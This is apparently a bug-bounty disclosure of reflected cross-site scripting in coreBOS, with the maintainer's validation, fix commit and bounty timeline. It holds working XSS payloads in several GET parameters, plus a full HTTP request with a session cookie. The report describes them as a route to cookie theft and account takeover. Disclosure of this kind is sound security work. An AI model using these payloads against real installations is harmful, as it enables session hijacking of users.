Cross-site Scripting (XSS) - Reflected in tsolucio/corebos


Reported on

Dec 20th 2021


coreBOS is vulnerable to Reflected Cross-Site Scripting in the advft_criteria_groups - advft_criteria parameters.


  • Outside the JSON object.
  • Inside the JSON object.
[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:Vqvl14><img src=a onerror=alert(1)>znemq","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}]


GET /index.php?module=Documents&action=Popup&html=Popup_picker&forfield=gendoctemplateburr&srcmodule=evvtgendoc&forrecord=&form=&query=true&search=true&searchtype=advance&advft_criteria=[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:V","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}><script>alert(1)</script>&advft_criteria_groups=[null,{%22groupcondition%22:%22%22}]><script>alert(2)</script> HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: democoreboscom=8f928841548129a8317753f05afccd66; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=4101476105348538


This vulnerability is capable of stealing users' cookies and gaining full account take over through his credentials.


Get Request:

  • paramteter > type"accesskey="x"onclick="alert(1)"//qa8lof2qh5k&search_text=Q&form=&forfield=&srcmodule=&forrecord=&selected_module=Accounts&__vt5rftk=sid:fb865148cbe7a0b1f0dd2c7a227b0c2c1a7d0667,1640278340&null=


click SHIFT + ALT + X to trigger the payload


Get Request:

  • paramteter > reportmodule<script>alert(1)</script>kle7w&cbreporttype=directsq


We are processing your report and will contact the tsolucio/corebos team within 24 hours. a year ago
Muhammad Adel submitted a
a year ago
Muhammad Adel modified the report
a year ago
Joe Bordes
a year ago

Hi @itsfading

Thank you so much for your effort. I really appreciate it. In coreBOS we do not use mysqli_real_escape_string, we use pquery instead

$adb->pquery(SQL, array(of, parameters));

can you change those?

Muhammad Adel
a year ago


Hi Joe, I think you are referring to the SQL Injection report and it is not related to something here right? I am not quite aware of the syntax of pquery and cannot find documentation for it. Also, it seems you are using it correctly in some places but the vulnerability is still working that's why I used mysqli_real_escape_string whenever you take the input from the user.

We have contacted a member of the tsolucio/corebos team and are waiting to hear back a year ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. a year ago
Muhammad Adel modified the report
a year ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. a year ago
Joe Bordes validated this vulnerability a year ago
Muhammad Adel has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes marked this as fixed in 8.0 with commit 8c1556 a year ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
NewReport0.php#L109-L131 has been validated
Save.php#L112-L116 has been validated
RecycleBinUtils.php#L41-L54 has been validated
a year ago

Hi, This issue is not fixed on demo website.

to join this conversation